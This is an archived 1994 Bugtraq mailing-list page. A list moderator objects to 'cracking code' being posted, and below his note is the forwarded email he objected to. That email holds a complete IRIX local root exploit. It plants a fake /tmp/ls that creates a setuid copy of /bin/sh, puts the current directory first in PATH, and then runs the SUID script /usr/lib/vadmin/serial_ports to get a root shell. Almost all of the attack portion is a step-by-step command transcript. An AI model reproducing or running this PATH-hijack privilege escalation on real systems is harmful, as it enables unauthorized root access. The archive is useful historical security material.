Bugtraq mailing list archives

[Tim Newsham: IRIX Race Conditions]

From: brent () miles greatcircle com (Brent Chapman)
Date: Sun, 2 Oct 1994 10:07:45 -1000


Why are you posting this to Firewalls?  One of the few hard and fast
policies on Firewalls is "don't post cracking code".  I consider this
a violation of that policy.

What gives?


-Brent
--
Brent Chapman         | Great Circle Associates  | Call or email for info about
Brent () GreatCircle COM | 1057 West Dana Street    | upcoming Internet Security 
+1 415 962 0841       | Mountain View, CA  94041 | Firewalls Tutorial dates

------- Forwarded Message

Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [143.191.19.67]) by miles.greatcircle.com 
(8.6.5/Miles-941001) with ESMTP id MAA11485; Sun, 2 Oct 1994 12:26:23 -0700
Received: from localhost by mycroft.GreatCircle.COM (8.6.5/SMI-4.1/Brent-940930)
        id SAA04097; Sun, 2 Oct 1994 18:18:05 GMT
Received: from miles.greatcircle.com by mycroft.GreatCircle.COM (8.6.5/SMI-4.1/Brent-940930)
        id LAA04091; Sun, 2 Oct 1994 11:17:54 -0700
Received: from relay1.Hawaii.Edu (relay1.Hawaii.Edu [128.171.41.53]) by miles.greatcircle.com (8.6.5/Miles-941001) with 
SMTP id LAA11312 for <firewalls () greatcircle com>; Sun, 2 Oct 1994 11:18:47 -0700
Received: from uhunix.uhcc.Hawaii.Edu ([128.171.44.6]) by relay1.Hawaii.Edu with SMTP id <11359>; Sun, 2 Oct 1994 
08:18:12 -1000
Received: by uhunix.uhcc.Hawaii.Edu id <184427>; Sun, 2 Oct 1994 08:18:00 -1000
Message-Id: <94Oct2.081800hst.184427 () uhunix uhcc Hawaii Edu>
From: Tim Newsham <newsham () uhunix uhcc Hawaii Edu>
To: firewalls () GreatCircle COM
Date:   Sun, 2 Oct 1994 08:17:58 -1000
Sender: Firewalls-Owner () GreatCircle COM
Precedence: bulk

From @galaxy.net.Hawaii.Edu:transit () primus com Wed Feb  2 15:36:23 1994

Received: from primus.com ([134.24.10.58]) by galaxy.net.Hawaii.Edu with SMTP id <120196>; Wed, 2 Feb 1994 15:04:57 
-1000
Received: by primus.com id AA01056
  (5.65c/IDA-1.4.4 for no-more-secrets () primus com); Wed, 2 Feb 1994 19:01:42 -0600
From: transit <transit () primus com>
Message-Id: <199402030101.AA01056 () primus com>
Subject: IRIX Race Conditions
To: no-more-secrets () primus com
Date:   Wed, 2 Feb 1994 15:01:42 -1000
X-Mailer: ELM [version 2.4 PL22]
Content-Type: text
Content-Length: 392       
Status: OR

IRIX Race Conditions with their SUID administration scripts
are evil juju.

reality 1% cat > /tmp/ls
#!/bin/sh
cp /bin/sh /tmp/foo
chmod 4777 /tmp/foo
^D
reality 2% chmod 755 /tmp/ls
reality 3% cd /tmp
reality 4% set PATH=( . $PATH )
reality 5% /usr/lib/vadmin/serial_ports
# wait about 10-20 seconds and hit ^C, or wait for it to
# die out completely
reality 6% /tmp/foo
# whoami
root


tx.


------- End of Forwarded Message

Current thread:

[Tim Newsham: IRIX Race Conditions] Tim Newsham (Oct 02)
- <Possible follow-ups>
- [Tim Newsham: IRIX Race Conditions] Tim Newsham (Oct 02)
  - Re: your mail Joseph W. Stroup (Oct 02)
  - SUMMARY Security Info (root broken) Pat Myrto (Oct 03)
    - Re: SUMMARY Security Info (root broken) Luke Mewburn (Oct 03)
    - Re: SUMMARY Security Info (root broken) Pat Myrto (Oct 03)
    - Re: SUMMARY Security Info (root broken) Casper Dik (Oct 04)
- [Tim Newsham: IRIX Race Conditions] Tim Newsham (Oct 02)
- [Tim Newsham: IRIX Race Conditions] Tim Newsham (Oct 02)
- [Tim Newsham: IRIX Race Conditions] Brent Chapman (Oct 02)